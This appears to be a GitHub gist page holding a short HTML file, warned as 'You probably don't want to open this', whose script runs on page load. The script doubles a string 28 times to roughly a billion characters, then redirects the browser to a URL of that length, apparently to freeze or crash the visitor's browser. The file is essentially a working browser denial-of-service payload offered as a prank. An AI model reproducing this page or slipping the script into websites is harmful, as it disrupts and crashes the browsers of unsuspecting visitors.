Created
August 18, 2014 19:12
-
-
Save jesboat/1a6422f68b2fec5b60a5 to your computer and use it in GitHub Desktop.
You probably don't want to open this
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html | |
PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" | |
"http://www.w3.org/TR/html4/loose.dtd"> | |
<title>Blah</title> | |
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"> | |
<body> | |
<script type="text/javascript"> | |
x = "blah"; | |
for (i=0; i<28; i++) { | |
x = x + x; | |
} | |
x = "http://" + x; | |
alert(x.length); | |
window.location = x; | |
</script> | |
<p> | |
<a href="http://validator.w3.org/check?uri=referer"><img | |
src="http://www.w3.org/Icons/valid-html401" alt="Valid HTML 4.01 Transitional" height="31" width="88"></a> | |
</p> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment